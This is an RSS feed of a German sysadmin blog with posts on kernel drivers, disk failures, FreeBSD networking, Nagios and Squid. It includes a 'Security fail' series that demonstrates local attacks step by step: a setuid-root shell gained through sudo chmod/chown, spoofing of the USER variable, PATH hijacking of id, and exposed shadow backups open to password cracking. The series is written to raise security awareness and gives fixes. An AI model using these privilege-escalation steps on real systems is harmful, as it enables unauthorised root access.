<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>adminlife.net &#187; stefan</title>
	<atom:link href="http://www.adminlife.net/author/stefan/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.adminlife.net</link>
	<description>... aus dem Alltag eines Sysadmins</description>
	<lastBuildDate>Tue, 27 Sep 2011 14:43:32 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>Neuer Blog</title>
		<link>http://www.adminlife.net/allgemein/neuer-blog/</link>
		<comments>http://www.adminlife.net/allgemein/neuer-blog/#comments</comments>
		<pubDate>Sun, 01 May 2011 23:43:53 +0000</pubDate>
		<dc:creator>stefan</dc:creator>
				<category><![CDATA[allgemein]]></category>
		<category><![CDATA[blog]]></category>
		<category><![CDATA[adminlife]]></category>

		<guid isPermaLink="false">http://www.adminlife.net/?p=2307</guid>
		<description><![CDATA[Nachdem es um das Adminlife.net Projekt stiller geworden ist, und ich gerne an der Struktur der Seite usw. einiges ändern wollte, jedoch auf Matthias Webserver keinen root-Zugriff habe, haben wir uns drauf verständig, dass ich einen eigenen Blog eröffnen werde. Der alte Blog bleibt in seiner jetzigen Form erhalten, wird von uns jedoch nicht weiter [...]]]></description>
			<content:encoded><![CDATA[<p align="justify">Nachdem es um das <A HREF="www.adminlife.net">Adminlife.net</A> Projekt stiller geworden ist, und ich gerne an der Struktur der Seite usw. einiges ändern wollte, jedoch auf Matthias Webserver keinen root-Zugriff habe, haben wir uns drauf verständig, dass ich einen eigenen Blog eröffnen werde. Der alte Blog bleibt in seiner jetzigen Form erhalten, wird von uns jedoch nicht weiter geführt.</p>
<p align="justify">
Diejenigen, die den Blog über Feedreader abonniert hatten: hier kommt nichts mehr, weiter gehts auf <A href="http://www.admlife.de">ADMinLIFE</A>. Also los: Reader umstellen! <img src='http://www.adminlife.net/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p><!-- PHP 5.x --></p>
]]></content:encoded>
			<wfw:commentRss>http://www.adminlife.net/allgemein/neuer-blog/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Kernel 2.6.37: Qualcomm (qcserial.c) für gobi 2000 geändert</title>
		<link>http://www.adminlife.net/news/kernel-2-6-37-qualcomm-qcserial-c-fuer-gobi-2000geaendert/</link>
		<comments>http://www.adminlife.net/news/kernel-2-6-37-qualcomm-qcserial-c-fuer-gobi-2000geaendert/#comments</comments>
		<pubDate>Tue, 11 Jan 2011 00:29:00 +0000</pubDate>
		<dc:creator>stefan</dc:creator>
				<category><![CDATA[adminlife]]></category>
		<category><![CDATA[news]]></category>
		<category><![CDATA[reviews]]></category>
		<category><![CDATA[tipps]]></category>
		<category><![CDATA[git bisect]]></category>
		<category><![CDATA[gobi 2000]]></category>
		<category><![CDATA[gobi2000]]></category>
		<category><![CDATA[kernel]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[qcserial]]></category>
		<category><![CDATA[qcserial.c]]></category>

		<guid isPermaLink="false">http://www.adminlife.net/?p=2289</guid>
		<description><![CDATA[Seltsamerweise funktionierte die Gobi 2000 Karte meins x201 mit 2.6.36 noch, 2.6.37 nicht mehr. Nach einigem git bisect&#8217;en ergab sich vorhin: Bisecting: 0 revisions left to test after this (roughly 0 steps) [1992de83e375acc789daf66b7b72a812a5235b75] USB: qcserial: Enable Diagnostics Monitor and GPS ports on Gobi 2000 Nun muss /dev/ttyUSB1 statt wie bisher /dev/ttyUSB0 genutzt werden. Aber wer [...]]]></description>
			<content:encoded><![CDATA[<p>Seltsamerweise funktionierte die Gobi 2000 Karte meins x201 mit 2.6.36 noch, 2.6.37 nicht mehr.</p>
<p>Nach einigem git bisect&#8217;en ergab sich vorhin:</p>
<pre><strong>Bisecting: 0 revisions left to test after this (roughly 0 steps)

[1992de83e375acc789daf66b7b72a812a5235b75] USB: qcserial: Enable Diagnostics Monitor and GPS ports on Gobi 2000</strong></pre>
<p>
Nun muss /dev/ttyUSB1 statt wie bisher /dev/ttyUSB0 genutzt werden. Aber wer liest schon dauernd die LKML oder guckt sich alle Changes vor einem Kernel-Update an? <img src='http://www.adminlife.net/wp-includes/images/smilies/icon_sad.gif' alt=':(' class='wp-smiley' /> <!-- PHP 5.x --></p>
]]></content:encoded>
			<wfw:commentRss>http://www.adminlife.net/news/kernel-2-6-37-qualcomm-qcserial-c-fuer-gobi-2000geaendert/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Warnung: hohe Ausfallquote bei WD SATA Raid Edition</title>
		<link>http://www.adminlife.net/allgemein/warnung-wd-sata-raid-edition-ausfallquote/</link>
		<comments>http://www.adminlife.net/allgemein/warnung-wd-sata-raid-edition-ausfallquote/#comments</comments>
		<pubDate>Thu, 20 May 2010 22:36:12 +0000</pubDate>
		<dc:creator>stefan</dc:creator>
				<category><![CDATA[allgemein]]></category>
		<category><![CDATA[news]]></category>
		<category><![CDATA[tipps]]></category>
		<category><![CDATA[defekt]]></category>
		<category><![CDATA[Festplatten]]></category>
		<category><![CDATA[RAID Edition]]></category>
		<category><![CDATA[WD]]></category>
		<category><![CDATA[WD2502ABYS]]></category>

		<guid isPermaLink="false">http://www.adminlife.net/?p=2262</guid>
		<description><![CDATA[Achtung: die Western Digital 250 GB Raid Edition Festplatten haben bei mir im Rechenzentrum derzeit eine gefühlte Ausfallquote von 10%. Angeblich ist eine bestimmte Charge von den Ausfällen betroffen, offizielle Angaben gibt es derzeit soweit ich weiß (noch?) nicht. Unser Lieferant erledigt Garantiefälle für uns recht unbürokratisch &#8211; wir schicken nie direkt zu WD, weil [...]]]></description>
			<content:encoded><![CDATA[<p><img class="alignleft" src="http://data68.sevenload.com/slcom/tm/qj/edehfc/obznkkinkee.jpg~/Western-Digital-RAID-Edition-WD2500SB.jpg" alt="" width="180" height="180" /></p>
<p><strong>Achtung</strong>: die Western Digital 250 GB Raid Edition Festplatten haben bei mir im Rechenzentrum derzeit eine gefühlte Ausfallquote von 10%. Angeblich ist eine bestimmte Charge von den Ausfällen betroffen, offizielle Angaben gibt es derzeit soweit ich weiß (noch?) nicht.</p>
<p>Unser Lieferant erledigt Garantiefälle für uns recht unbürokratisch &#8211; wir schicken nie direkt zu WD, weil wir teils Platten im Vorabaustausch bekommen. Er hat jedenfalls eine größere Menge defekte Festplatten weitergeleitet und nun haben wir für einige Platten als Ersatz 500 GB Modelle bekommen &#8211; für lau. Man munkelt, dass aufgrund der extrem hohen Rücklaufzahlen der Bedarf an 250ern derzeit nicht gedeckt werden kann.</p>
<p>Es bleibt spannened. Sobald ich etwas genaueres weiß, werde ich hier was schreiben.</p>
<p><strong>Edit:</strong> Falls bei euch in letzter Zeit auch viel ausgefallen ist, schreibt bitte das Alter der Festplatten dazu!<!-- PHP 5.x --></p>
]]></content:encoded>
			<wfw:commentRss>http://www.adminlife.net/allgemein/warnung-wd-sata-raid-edition-ausfallquote/feed/</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>Security fail pt4: Backups</title>
		<link>http://www.adminlife.net/hacks/security-fail-pt4-backups/</link>
		<comments>http://www.adminlife.net/hacks/security-fail-pt4-backups/#comments</comments>
		<pubDate>Wed, 28 Apr 2010 17:10:56 +0000</pubDate>
		<dc:creator>stefan</dc:creator>
				<category><![CDATA[adminlife]]></category>
		<category><![CDATA[hacks]]></category>
		<category><![CDATA[tipps]]></category>
		<category><![CDATA[backup]]></category>
		<category><![CDATA[Fail]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[hacked]]></category>

		<guid isPermaLink="false">http://www.adminlife.net/?p=2213</guid>
		<description><![CDATA[Auch immer wieder gesehen: falsche Berechtigungen von Backups. [user@srv2342 ~]$ ls -l /opt/backup -rw-r--r-- 1 root root 2,6M 09. Apr 20:30 etc-20100409.tgz -rw-r--r-- 1 root root 2,6M 10. Apr 20:30 etc-20100410.tgz -rw-r--r-- 1 root root 2,6M 11. Apr 20:30 etc-20100411.tgz -rw-r--r-- 1 root root 2,6M 12. Apr 20:30 etc-20100412.tgz Natürlich war auch die /etc/shadow enthalten&#8230; [...]]]></description>
			<content:encoded><![CDATA[<p><img class="alignleft" src="http://blurredproductions.files.wordpress.com/2009/03/sisko-facepalm.jpg" alt="Facepalm" width="236" height="191" />Auch immer wieder gesehen: falsche Berechtigungen von Backups.</p>
<p><code><br />
[user@srv2342 ~]$ ls -l /opt/backup<br />
-rw-r--r-- 1 root root 2,6M 09. Apr 20:30 etc-20100409.tgz<br />
-rw-r--r-- 1 root root 2,6M 10. Apr 20:30 etc-20100410.tgz<br />
-rw-r--r-- 1 root root 2,6M 11. Apr 20:30 etc-20100411.tgz<br />
-rw-r--r-- 1 root root 2,6M 12. Apr 20:30 etc-20100412.tgz<br />
</code></p>
<p>Natürlich war auch die /etc/shadow enthalten&#8230; john macht damit bekanntlich meist kurzen Prozess.</p>
<p>Beliebt sind scheinbar auch Scripte, die etwas der folgenden Art machen, um Backups zu erstellen und die Rechte korrekt zu setzen:<br />
<code><br />
tar -czf  /opt/backup/etc-backup.tgz /etc<br />
chmod 600 /opt/backup/etc-backup.tgz<br />
</code><br />
Hier entsteht eine klassische Race-Condition. Falls der Angreifer die Platten verlangsamt (z.B. per dd) und/oder eine while true Schleife nutzt, die er kurz vor Backupbeginn startet, kann er evtl. Teile oder das gesamte Backup kopieren.</p>
<p>Besser: Global umask 0027 setzen. Falls nicht möglich (z.B. Firmen-Policy), einfach vor dem Aufruf von tar ausführen:<br />
<code><br />
umask 0027<br />
tar -czf  /opt/backup/etc-backup.tgz /etc<br />
</code></p>
<p>Backups müssen genauso wie die Originaldaten behandelt werden und gehören nicht nach /tmp oder mit unsicheren Dateirechten sonstwohin.<!-- PHP 5.x --></p>
]]></content:encoded>
			<wfw:commentRss>http://www.adminlife.net/hacks/security-fail-pt4-backups/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Security fail pt3: Userauthentifizierung über externe Kommandos</title>
		<link>http://www.adminlife.net/hacks/security-fail-pt3-userauthentifizierung-ueber-externe-kommandos/</link>
		<comments>http://www.adminlife.net/hacks/security-fail-pt3-userauthentifizierung-ueber-externe-kommandos/#comments</comments>
		<pubDate>Wed, 14 Apr 2010 16:47:09 +0000</pubDate>
		<dc:creator>stefan</dc:creator>
				<category><![CDATA[hacks]]></category>
		<category><![CDATA[howtos]]></category>
		<category><![CDATA[tipps]]></category>
		<category><![CDATA[wissen]]></category>
		<category><![CDATA[bash]]></category>
		<category><![CDATA[Fail]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[hacked]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://www.adminlife.net/?p=2229</guid>
		<description><![CDATA[Tim schlug hier vor, im Vorpost etwas anderes zur Authentifizierung als $USER zu nutzen: id. Auch das ist unsicher, wenn man es falsch macht. Ich benutze hier einfach mal die UIDs statt der Usernamen. Der folgende Code wäre dann die id-Variante, wer findet das Sicherheitsproblem? #!/bin/bash if [ "$(id -u)" != "1001" ] &#38;&#38; [ [...]]]></description>
			<content:encoded><![CDATA[<p><img class="alignleft" src="http://www.poormojo.org/pmjadaily/archives/Blank-Facepalm.gif" alt="" width="168" height="125" /></p>
<p>Tim schlug <a href="http://www.adminlife.net/allgemein/security-fail-pt2-userauthentifizierung-in-bash/#comment">hier</a> vor, im Vorpost etwas anderes zur Authentifizierung als $USER zu nutzen: id. Auch das ist unsicher, wenn man es falsch macht. Ich benutze hier einfach mal die UIDs statt der Usernamen. Der folgende Code wäre dann die id-Variante, wer findet das Sicherheitsproblem? <img src='http://www.adminlife.net/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /><br />
<BR><BR></p>
<p><code><br />
#!/bin/bash<br />
if [ "$(id -u)" != "1001" ] &amp;&amp; [ "$(id -u)" != "1002" ]<br />
then<br />
echo "Zugriff verweigert."<br />
else<br />
echo OK<br />
[...]<br />
echo "$(date) Domain $1 gelöscht durch $USER" &gt;&gt; /var/log/domainlog<br />
fi<br />
</code></p>
<p>Umgehen kann man es jedoch wieder trivial, man erstelle ~/id:<br />
<code><br />
[stefan@srv2342 ~]$ sh authme.sh<br />
Zugriff verweigert.<br />
[stefan@srv2342 ~]$ echo "echo 1001" &gt; ~/id<br />
[stefan@srv2342 ~]$ chmod +x ~/id<br />
[stefan@srv2342 ~]$ PATH=".:$PATH" sh authme.sh<br />
OK<br />
[stefan@srv2342 ~]$<br />
</code></p>
<p>Wir haben hier PATH so geändert, dass zuerst im aktuellen Pfad nach id Datei gesucht wird &#8211; die Datei haben wir grade angelegt und sie gibt aus, was das Script als Antwort sehen möchte. Whoops! ;D<!-- PHP 5.x --></p>
]]></content:encoded>
			<wfw:commentRss>http://www.adminlife.net/hacks/security-fail-pt3-userauthentifizierung-ueber-externe-kommandos/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>Security fail pt2: Userauthentifizierung in BASH</title>
		<link>http://www.adminlife.net/allgemein/security-fail-pt2-userauthentifizierung-in-bash/</link>
		<comments>http://www.adminlife.net/allgemein/security-fail-pt2-userauthentifizierung-in-bash/#comments</comments>
		<pubDate>Tue, 13 Apr 2010 20:16:58 +0000</pubDate>
		<dc:creator>stefan</dc:creator>
				<category><![CDATA[allgemein]]></category>
		<category><![CDATA[hacks]]></category>
		<category><![CDATA[howtos]]></category>
		<category><![CDATA[tipps]]></category>
		<category><![CDATA[wissen]]></category>
		<category><![CDATA[bash]]></category>
		<category><![CDATA[Fail]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[hacker]]></category>

		<guid isPermaLink="false">http://www.adminlife.net/?p=2208</guid>
		<description><![CDATA[Um die Security awareness etwas zu erhöhen, habe ich überlegt, noch ein paar witzige Schnippsel zu posten! Vielleicht entdeckt ja jemand auch etwas, das er selbst mal gemacht hat! Hier folgt nun ein sinngemäßer Auszug aus einem Script, das bei einem ISP sehr kritische Aktionen für Domains ausführt: #!/bin/bash if [ "$USER" != "franz" ] [...]]]></description>
			<content:encoded><![CDATA[<p><img class="alignleft" src="http://www.justpressplay.net/images/stories/facepalm.jpg" alt="" width="229" height="172" /></p>
<p>Um die Security awareness etwas zu erhöhen, habe ich überlegt, noch ein paar witzige Schnippsel zu posten! Vielleicht entdeckt ja jemand auch etwas, das er selbst mal gemacht hat! <img src='http://www.adminlife.net/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p>Hier folgt nun ein sinngemäßer Auszug aus einem Script, das bei einem ISP sehr kritische Aktionen für Domains ausführt:<br />
<BR><BR><br />
<code><br />
#!/bin/bash<br />
if [ "$USER" != "franz" ] &amp;&amp; [ "$USER" != "karl" ]<br />
then<br />
echo "Zugriff verweigert."<br />
else<br />
[...]<br />
echo "$(date) Domain $1 gelöscht durch $USER" &gt;&gt; /var/log/domainlog<br />
fi<br />
</code></p>
<p>Wichtig ist hier vor allem das Audit Log. Umgehen kann man es jedoch trivial:<br />
<code><br />
USER=franz ./domain-delete.sh [domain]<br />
</code></p>
<p>Leider bedachte der Programmierer nicht, dass $USER natürlich trivial von jedem Shelluser geändert werden kann. Das Audit-Log würde ggfs. sehr unerfreuliche Folgen haben.</p>
<p>Bessere Lösung: sudo benutzen und nur den zwei Usern, die es wirklich benötigen, Rechte auf das Script gewähren.<!-- PHP 5.x --></p>
]]></content:encoded>
			<wfw:commentRss>http://www.adminlife.net/allgemein/security-fail-pt2-userauthentifizierung-in-bash/feed/</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>Security fail pt1: sudo chmod/chown</title>
		<link>http://www.adminlife.net/allgemein/sudo-chmodchown-fail/</link>
		<comments>http://www.adminlife.net/allgemein/sudo-chmodchown-fail/#comments</comments>
		<pubDate>Thu, 08 Apr 2010 23:06:16 +0000</pubDate>
		<dc:creator>stefan</dc:creator>
				<category><![CDATA[allgemein]]></category>
		<category><![CDATA[hacks]]></category>
		<category><![CDATA[wissen]]></category>
		<category><![CDATA[C]]></category>
		<category><![CDATA[chmod]]></category>
		<category><![CDATA[chown]]></category>
		<category><![CDATA[Fail]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[sudo]]></category>

		<guid isPermaLink="false">http://www.adminlife.net/?p=2191</guid>
		<description><![CDATA[Auf einem Webserver fand ich kürzlich eine sudoers-Zeile, die einem User erlaubte, chmod und chown für ein bestimmtes Verzeichnis (/foo) auszuführen. Sowas sollte man tunlichst vermeiden. user@srv2342: ~&#62; id uid=1007(user) gid=100(users) groups=16(dialout),33(video),100(users) Ich brauche zuerst ein kleines C-Tool: user@srv2342: ~&#62; cat &#62; /foo/y.c #include int main() { setuid(0); setgid(0); system("/bin/bash"); } STRG-D Compilieren: user@srv2342:/foo&#62; cd [...]]]></description>
			<content:encoded><![CDATA[<p><img class="alignleft" src="http://thegamereviews.com/images/uploads/20080918_Picard_Facepalm.jpg" alt="Facepalm" width="233" height="151" /></p>
<p>Auf einem Webserver fand ich kürzlich eine <em>sudoers</em>-Zeile, die einem User erlaubte, chmod und chown für ein bestimmtes Verzeichnis (/foo) auszuführen. Sowas sollte man tunlichst vermeiden.<br />
<code><br />
user@srv2342: ~&gt; id<br />
uid=1007(user) gid=100(users) groups=16(dialout),33(video),100(users)<br />
</code><br />
<BR><br />
Ich brauche zuerst ein kleines C-Tool:<br />
<code><br />
user@srv2342: ~&gt; cat &gt; /foo/y.c<br />
#include<br />
int main()<br />
{<br />
setuid(0);<br />
setgid(0);<br />
system("/bin/bash");<br />
}<br />
STRG-D<br />
</code></p>
<p>Compilieren:<br />
<code><br />
user@srv2342:/foo&gt; cd /foo; gcc y.c -o y<br />
</code></p>
<p>Jetzt machen wir sudo-magic und erhalten ein SetUID-Bit:</p>
<p><code>user@srv2342:/foo&gt; sudo /bin/chown 0:0 /foo/y<br />
user@srv2342:/foo&gt; sudo /bin/chmod 4775 /foo/y<br />
user@srv2342:/foo ls -l<br />
total 16<br />
-rwsrwxr-x 1 root        root         9217 Mar 26 14:52 y<br />
-rw-r----- 1 user        users         101 Mar 26 14:51 y.c<br />
</code></p>
<p>Root werden:<br />
<code><br />
user@srv2342:/foo&gt; ./y<br />
srv2342:/foo # id<br />
uid=0(root) gid=0(root) groups=16(dialout),33(video),100(users)</code></p>
<p>Owned! <img src='http://www.adminlife.net/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> <!-- PHP 5.x --></p>
]]></content:encoded>
			<wfw:commentRss>http://www.adminlife.net/allgemein/sudo-chmodchown-fail/feed/</wfw:commentRss>
		<slash:comments>9</slash:comments>
		</item>
		<item>
		<title>FreeBSD: Ethernet Point-to-Point Verbindung</title>
		<link>http://www.adminlife.net/allgemein/freebsd-ethernet-point-to-point-verbindung/</link>
		<comments>http://www.adminlife.net/allgemein/freebsd-ethernet-point-to-point-verbindung/#comments</comments>
		<pubDate>Fri, 29 Jan 2010 14:05:32 +0000</pubDate>
		<dc:creator>stefan</dc:creator>
				<category><![CDATA[allgemein]]></category>
		<category><![CDATA[howtos]]></category>
		<category><![CDATA[tipps]]></category>
		<category><![CDATA[bsd]]></category>
		<category><![CDATA[freebsd]]></category>
		<category><![CDATA[network]]></category>
		<category><![CDATA[netzwerk]]></category>
		<category><![CDATA[point-to-point]]></category>
		<category><![CDATA[pointopoint]]></category>
		<category><![CDATA[ptp]]></category>
		<category><![CDATA[routing]]></category>

		<guid isPermaLink="false">http://www.adminlife.net/?p=2174</guid>
		<description><![CDATA[Hier eine Kurzanleitung für all diejenigen, die ein FreeBSD unter kvm mit Point-to-Point benutzen wollen und daran verzweifelt sind, ins Netz zu kommen (dies ist ein kleiner Reminder für mich selbst *g): Lokal ist hier die IP 192.168.0.220, Remote ist 192.168.0.210. /etc/rc.conf: ifconfig_em0="inet 192.168.0.220 192.168.0.210" static_routes="default" route_default="-net 0.0.0.0 -iface -interface em0" Ist auf der anderen [...]]]></description>
			<content:encoded><![CDATA[<p>Hier eine Kurzanleitung für all diejenigen, die ein FreeBSD unter kvm mit Point-to-Point benutzen wollen und daran verzweifelt sind, ins Netz zu kommen (dies ist ein kleiner Reminder für mich selbst *g):</p>
<p>Lokal ist hier die IP 192.168.0.220, Remote ist 192.168.0.210.</p>
<p>/etc/rc.conf:</p>
<p style="padding-left: 30px"><code>ifconfig_em0="inet 192.168.0.220 192.168.0.210"<br />
static_routes="default"<br />
route_default="-net 0.0.0.0 -iface -interface em0"</code></p>
<p style="padding-left: 30px">
<p>Ist auf der anderen Seite Linux im Einsatz, so macht man dort:</p>
<p style="padding-left: 30px">
<code>ip addr add 192.168.0.210 peer 192.168.0.220/32 dev tunX</code></p>
<p>Natürlich erst, nachdem das neue tun-Interface oben ist (also z.B. im eigenen up-Script). <img src='http://www.adminlife.net/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> <!-- PHP 5.x --></p>
]]></content:encoded>
			<wfw:commentRss>http://www.adminlife.net/allgemein/freebsd-ethernet-point-to-point-verbindung/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Review: Praxisbuch Nagios</title>
		<link>http://www.adminlife.net/buecher/praxisbuch-nagios/</link>
		<comments>http://www.adminlife.net/buecher/praxisbuch-nagios/#comments</comments>
		<pubDate>Thu, 17 Dec 2009 01:50:50 +0000</pubDate>
		<dc:creator>stefan</dc:creator>
				<category><![CDATA[bücher]]></category>

		<guid isPermaLink="false">http://www.adminlife.net/?p=1682</guid>
		<description><![CDATA[Vor einiger Zeit kam das im Juni erschienene Praxisbuch Nagios bei mir an &#8211; Aufgrund von Prüfungen, Arbeitsstress etc. bin ich allerdings leider erst kürzlich dazu gekommen, es intensiver zu betrachten; das Schreiben dieses Reviews hat sich dann ebenfalls etwas hingezogen&#8230; Eins vorweg: das Buch ist sowohl für den Einsteiger, als auch für den fortgeschritteneren [...]]]></description>
			<content:encoded><![CDATA[<p><img src="http://www.adminlife.net/wp-content/uploads/2009/12/praxisbuch_nagios.png" alt="praxisbuch_nagios" width="133" height="173" class="alignleft size-full wp-image-2171" />
<p align="justify">Vor einiger Zeit kam das im Juni erschienene <a href="http://www.amazon.de/gp/product/3897218801?ie=UTF8&amp;tag=adaudeleeisy-21&amp;linkCode=as2&amp;camp=1638&amp;creative=19454&amp;creativeASIN=3937514651">Praxisbuch Nagios</a> bei mir an &#8211; Aufgrund von Prüfungen, Arbeitsstress etc. bin ich allerdings leider erst kürzlich dazu gekommen, es intensiver zu betrachten; das Schreiben dieses Reviews hat sich dann ebenfalls etwas hingezogen&#8230;</p>
<p align="justify">Eins vorweg: das Buch ist sowohl für den Einsteiger, als auch für den fortgeschritteneren Admin als Nachschlagewerk oder Inspiration brauchbar, denn es wird auch auf fortgeschrittenere Themen wie z.B. Visualisierung und Pluginprogrammierung eingegangen.</p>
<p align="justify">Ausführlich erläutert das Buch anfangs, was mit Nagios möglich ist, was es mit Scheduling, Plugins, Benachrichtigungen, CGIs fürs Webinterface, Zeitperioden, Check-Kommandos, Templates usw. auf sich hat &#8211; jeweils ausführlich anhand von Beispielen. Dank der mitgelieferten Live-CD kann man bei Interesse auch zu haus sehr schnell selbst loslegen, ohne ein gesamtes Nagios installieren und konfigurieren zu müssen.<span id="more-1682"></span>Im 2. Teil des Buches wird anhand eines beispielhaften Unternehmens ausführlich beschrieben, wie eine initiale Nagios-Installation einzurichten ist &#8211; der gesamte Prozess von der Ist-Aufnahme bis zu Alarmierungsmöglichckeiten im Fehlerfalle. So lernt man z.B. welche Checks wofür Sinn machen, wie sinnvoll mit Templates gearbeitet werden kann und wie genau das Ganze dann in der Praxis umgesetzt wird. In späteren Kapiteln werden auch <a href="ios-wiki.de/nagios/howtos/nrpe">NRPE</a> (Nagios Remote Plugin Executor), <a href="http://nsclient.org/nscp/">NSCP</a> (NagiosClient++ für Windows) und <a href="http://www.nagios-wiki.de/nagios/plugins/check_by_ssh">check_by_ssh</a> erläutert, die wichtig sind, um beispielsweise auf entfernten Servern Festplattenkapazitäten zu überprüfen, weiterhin wird auch auf passive Überwachung per <a href="http://www.nagios-wiki.de/nagios/howtos/nsca_server">NSCA</a> (Nagios Service Check Acceptor) eingegangen &#8211; dadurch kann z.B. eine Firewall von sich aus Meldungen per SNMP Trap an Nagios übermitteln, sodass kein ständiges Polling stattfinden muss. Wie immer, wird alles &#8211; auch das ggfs. notwendige Compilieren &#8211; ausführlich beschrieben, sodass man nicht Anweisungen wie &#8220;Installieren Sie nun snmptt.&#8221; allein gelassen wird.</p>
<p align="justify">Im 3. Teil wird letztendlich auf graphische Auswertungsmethoden eingegangen, um die man als Administrator über kurz oder lang nicht herumkommt &#8211; vor allem, wenn <a href="http://de.wikipedia.org/wiki/ITIL">ITIL</a> vor der Tür steht. Hier wird im Detail auf <a href="http://docs.pnp4nagios.org/de/pnp-0.4/start">PNP</a> und <a href="http://www.nagvis.org/">NagVis</a> eingegangen, auch einige Tuning-Hinweise fehlen nicht.</p>
<p align="justify">Zuletzt gibt es noch ein meiner Ansicht nach sehr sinnvolles Kapitel über Plugin-Programmierung incl. Quellcodes &#8211; irgendwann kommt man nämlich an die Stelle, an der man für einen bestimmten Service oder eine bestimmte Anwendung &#8211; etwa für ein proprietäres Tool zur Raidcontrollerüberprüfung &#8211; kein passendes Plugin findet. Eine Übersicht der Konfigurationsoptionen der Nagios-Dateien mit jeweiliger Erläuterung findet sich im Anhang &#8211; als Nachschlagewerk praktisch.</p>
<p align="justify">Als Admin, der bereits Berührungspunkte mit Nagios hatte, wird man einige Teile zwar überblättern, spätestens aber bei der Pluginprogrammierung und Visualisierung innehalten &#8211; auch die über das gesamte Buch hinweg eingestreuten nützlichen &#8220;kleine Tipps&#8221; wie z.B. den Hinweis auf NagiosChecker für Firefox (den ich selbst seit längerer Zeit benutze) erweitern das Wissen über das Nagios-Universium.</p>
<p align="justify">Meine einzige Kritik ist, dass im Kapitel zu NRPE unerwähnt bleibt, dass solche Checks auch z.B. über ein bereits installiertes net-snmp per exec ausgeführt werden könnten &#8211; dies ist jedoch zugegebenermaßen weitaus weniger flexibel und erfordert ggfs. eine Softwaredeploymentlösung, möchte man auf einem konsistenten Stand bleiben.</p>
<p align="justify">Ich kann das Buch für Einsteiger und weniger erfahrene Nagios-Admins nur ausdrücklich empfehlen, selbst als erfahrener Nagios-Hase kann man aber evtl. noch ein paar interessante Sachen erfahren; der weit fortgeschrittene Admin mit &gt;2000 Checks in seinem Nagios wird sich zwar einen Großteil des Buches bereits selbst erarbeitet haben, könnte aber ggfs. trotzdem noch z.B. beim Templating, der Pluginprogrammierung oder Visualisierung etwas dazulernen.</p>
<p><!-- PHP 5.x --></p>
]]></content:encoded>
			<wfw:commentRss>http://www.adminlife.net/buecher/praxisbuch-nagios/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Squid url_rewrite Performance</title>
		<link>http://www.adminlife.net/tests/squid-url_rewrite-performance/</link>
		<comments>http://www.adminlife.net/tests/squid-url_rewrite-performance/#comments</comments>
		<pubDate>Sat, 26 Sep 2009 21:20:13 +0000</pubDate>
		<dc:creator>stefan</dc:creator>
				<category><![CDATA[tests]]></category>
		<category><![CDATA[tipps]]></category>
		<category><![CDATA[cache]]></category>
		<category><![CDATA[performance]]></category>
		<category><![CDATA[squid]]></category>
		<category><![CDATA[url_rewrite]]></category>

		<guid isPermaLink="false">http://www.adminlife.net/?p=1753</guid>
		<description><![CDATA[Hier ein Tipp für Sysadmins, die url_rewrite in Squid nutzen: schaut euch genau an, wie performant eure Scripte sind und benchmarkt diese unbedingt! Ich hatte die Tage ein Problem mit einem Squid, der ungewöhnlich hohe Load verursachte &#8211; es lag an ineffizienter Programmierung des Rewriters. Für eine Hand voll URLs sollte er Umleitungen vornehmen, etwa [...]]]></description>
			<content:encoded><![CDATA[<p><img class="alignleft size-full wp-image-1968" title="squid" src="http://www.adminlife.net/wp-content/uploads/2009/09/squid.png" alt="squid" width="120" height="56" /></p>
<p align="justify">Hier ein Tipp für Sysadmins, die url_rewrite in Squid nutzen: schaut euch genau an, wie performant eure Scripte sind und benchmarkt diese unbedingt!</p>
<p align="justify">
<p align="justify">Ich hatte die Tage ein Problem mit einem Squid, der ungewöhnlich hohe Load verursachte &#8211;  es lag an ineffizienter Programmierung des Rewriters. Für eine Hand voll URLs sollte er Umleitungen vornehmen, etwa von <code>^http://domain/formular</code> auf <code>https://domain/formular</code>.</p>
<p align="justify">Das ursprüngliche Script war in BASH programmiert &#8211; es verwendete externe Programme wie grep, sed &#8211; und war für geringe Bandbreiten (5MBit/s) performant genug. Die Bandbreite stieg jedoch bald auf  20MBit/s, was die Last schon sehr deutlich erhöhte, und  es werden voraussichtlich bald ~200MBit/s sein.</p>
<p align="justify">Das Script wurde daraufhin in Perl reimplementiert und läuft laut Benchmark um den Faktor 180 (!) schneller. Als Benchmark empfiehlt sich:</p>
<p>[code language="shell"]time tail /var/log/squid/access_combined.log -n 100000 | awk '{print $7}' | /pfad/zum/url_rewriter.pl &gt; /dev/null[/code]</p>
